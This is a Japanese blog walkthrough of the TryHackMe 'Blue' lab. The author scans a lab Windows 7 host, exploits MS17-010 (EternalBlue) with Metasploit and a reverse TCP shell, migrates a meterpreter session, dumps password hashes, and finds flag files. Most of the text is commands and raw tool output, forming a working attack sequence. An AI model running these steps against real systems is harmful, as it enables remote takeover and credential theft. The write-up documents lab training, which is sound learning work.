最近TryHackMeというハッキング環境提供サービス(←語彙力)にハマってるんですけど。実はずっとWriteupは別のところで英語で書いてたんですよ。
でもよく考えたら英語で書いてしまうと、振り返った時に自分でも何書いているかパッとわからないというどうしようもない(頭の悪い)問題があることに気がついたので、たまには日本語で書こうかなって気持ちになりました。ブログのネタにもなるし。
TryHackMeが気になる形はこちらをどうぞ
今回のテーマはこちらです。
この名前だけで知ってる人は解けちゃう初心者向けルームです。ちなみにHack the Boxの方にも同名のマシンがありますね。だいたい一緒です。
面倒なのとネタバレ防止のために質問の解答とかは書かないようにしますん。
もくじ
Nmapでスキャン
最初のスキャン
いつも忘れるけど結果をアウトプットしておくの(-oNオプション)大事と思ってる。
# Nmap 7.91 scan initiated Mon Nov 23 10:53:38 2020 as: nmap -sV -vv -oN initial.nmap --script vuln 10.10.176.20
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.176.20
Host is up, received conn-refused (0.40s latency).
Scanned at 2020-11-23 10:54:14 JST for 139s
Not shown: 991 closed ports
Reason: 991 conn-refused
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49158/tcp open msrpc syn-ack Microsoft Windows RPC
49160/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 23 10:56:33 2020 -- 1 IP address (1 host up) scanned in 174.87 secondsポート445(SMB)が開いてるなーってことと、ms17-010の脆弱性を発見する。今となってはちょっと懐かしい。知らない若者は先輩に聞いてみよう。
ms17-010の脆弱性を攻撃するツールの総称がEtarnalBlueって言われてて、ランサムウェア(WannaCry)で使われたりして2017年に流行ったんだよね。
私当時ウイルス対策ソフトを売る仕事をしていたので特需だったわー(老害ムーブをしてしまった)
Metasploitで侵入
Metasploit起動
nmz@kali:~/THM/Blue$ msfconsole
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%
%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%%
%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %%
%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%%
%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%%
%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
=[ metasploit v6.0.17-dev ]
+ -- --=[ 2076 exploits - 1124 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: View a module's description using info, or the enhanced version in your browser with info -d初心者なので普通にMetasploit使います。プロフェッショナルは自分でPoC探したり書いたりするんだと思う。
MS17-010のモジュールを探す
msf6 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce2番が使えそう
2番を使う
msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) >なんかペイロードがないって言われてるけどええのんか
必要なオプションを確認
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.11.19 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packsオプションを設定
RHOSTSが必要なのとLHOSTを自分が使ってるやつに書き換える。
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.176.20
RHOSTS => 10.10.176.20
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.4.20.231
LHOST => 10.4.20.231実行
個人的にはrunよりexploitの方がやってる感あって好き(多分意味はない)
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.4.20.231:4444
[*] 10.10.176.20:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.176.20:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.176.20:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 22 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.あれ。失敗した。
やっぱりペイロードないとだめじゃん。
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcpもっかい
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 10.4.20.231:4444
[*] 10.10.176.20:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.176.20:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.176.20:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.176.20:445 - Connecting to target for exploitation.
[+] 10.10.176.20:445 - Connection established for exploitation.
[+] 10.10.176.20:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.176.20:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.176.20:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.176.20:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.176.20:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.176.20:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.176.20:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.176.20:445 - Sending all but last fragment of exploit packet
[*] 10.10.176.20:445 - Starting non-paged pool grooming
[+] 10.10.176.20:445 - Sending SMBv2 buffers
[+] 10.10.176.20:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.176.20:445 - Sending final SMBv2 buffers.
[*] 10.10.176.20:445 - Sending last fragment of exploit packet!
[*] 10.10.176.20:445 - Receiving response from exploit packet
[+] 10.10.176.20:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.176.20:445 - Sending egg to corrupted connection.
[*] 10.10.176.20:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.4.20.231:4444 -> 10.10.176.20:49415) at 2020-11-23 14:37:52 +0900
[+] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.176.20:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>whoami
whoami
nt authority\systemなんか途中で失敗しててよくわからないが最終的に成功したのでヨシ!!(…)
Ctrl+z で一回もどる
C:\Windows\system32>^Z
Background session 1? [y/N] y
msf6 exploit(windows/smb/ms17_010_eternalblue) >特権昇格
metasploitでシェルをmeterpreterシェルに変換する
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] 10.4.20.231:4444 -> 10.10.176.20:49415 (10.10.176.20)
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1もっかい実行
msf6 post(multi/manage/shell_to_meterpreter) > exploit
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 10.4.20.231:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (175174 bytes) to 10.10.176.20
[*] Meterpreter session 2 opened (10.4.20.231:4433 -> 10.10.176.20:49421) at 2020-11-23 14:42:56 +0900
[*] Stopping exploit/multi/handler何も返事がなかったので一瞬わからなかった
msf6 post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [Version 6.1.7601] 10.4.20.231:4444 -> 10.10.176.20:49415 (10.10.176.20)
2 meterpreter x86/windows NT AUTHORITY\SYSTEM @ JON-PC 10.4.20.231:4433 -> 10.10.176.20:49421 (10.10.176.20)
msf6 post(multi/manage/shell_to_meterpreter) > sessions 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEMどうでもいいけどsessionなのかsessionsなのかわからなくなるな
プロセス確認
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
356 564 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
432 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM
492 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM
564 556 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
612 556 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
620 604 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
660 604 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
708 612 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
716 612 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
724 612 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
832 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM
864 2564 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
900 708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
948 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1016 660 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
1076 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1160 708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1340 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
1404 708 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1424 708 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
1480 708 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1616 708 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1944 708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
1984 2724 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2280 864 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
2372 1984 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2404 708 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
2412 2280 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2460 708 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
2504 564 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2564 708 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
2576 708 svchost.exe x64 0 NT AUTHORITY\SYSTEM
2616 708 vds.exe x64 0 NT AUTHORITY\SYSTEMマイグレーション
プロセスID指定してマイグレーション(移動)
meterpreter > migrate -h
Usage: migrate <<pid> | -P <pid> | -N <name>> [-t timeout]
Migrates the server instance to another process.
NOTE: Any open channels or other dynamic state will be lost.
meterpreter > migrate -P 660
[*] Migrating from 2372 to 660...
[*] Migration completed successfully.
meterpreter >なんかできた
パスワード解析
hashdump実行
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::ハッシュからジョンのパスワード解析
metasploitでやることもできるらしいが面倒なのでこのサイト使った
フラグ探し
なんかとりあえずdirコマンド叩いたらいきなりflag3があった
何か手順を間違えたのかもしれない。
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > dir
Listing: C:\Users\Jon\Documents
===============================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2018-12-13 12:13:31 +0900 My Music
40777/rwxrwxrwx 0 dir 2018-12-13 12:13:31 +0900 My Pictures
40777/rwxrwxrwx 0 dir 2018-12-13 12:13:31 +0900 My Videos
100666/rw-rw-rw- 402 fil 2018-12-13 12:13:45 +0900 desktop.ini
100666/rw-rw-rw- 37 fil 2018-12-13 12:49:18 +0900 flag3.txt
meterpreter > cat flag3.txt他のフラグを探す
searchコマンドマジ便利
meterpreter > search -f flag*.txt
Found 3 results...
c:\flag1.txt (24 bytes)
c:\Users\Jon\Documents\flag3.txt (37 bytes)
c:\Windows\System32\config\flag2.txt (34 bytes)cdで移動するのめんどくさいときはバックスラッシュを2つ入れると直接参照できる。
meterpreter > cat c:\\flag1.txt
meterpreter > cat c:\\Windows\\System32\\config\\flag2.txtおわり。
理解が怪しい部分も多いのでもっと慣れていきたい。
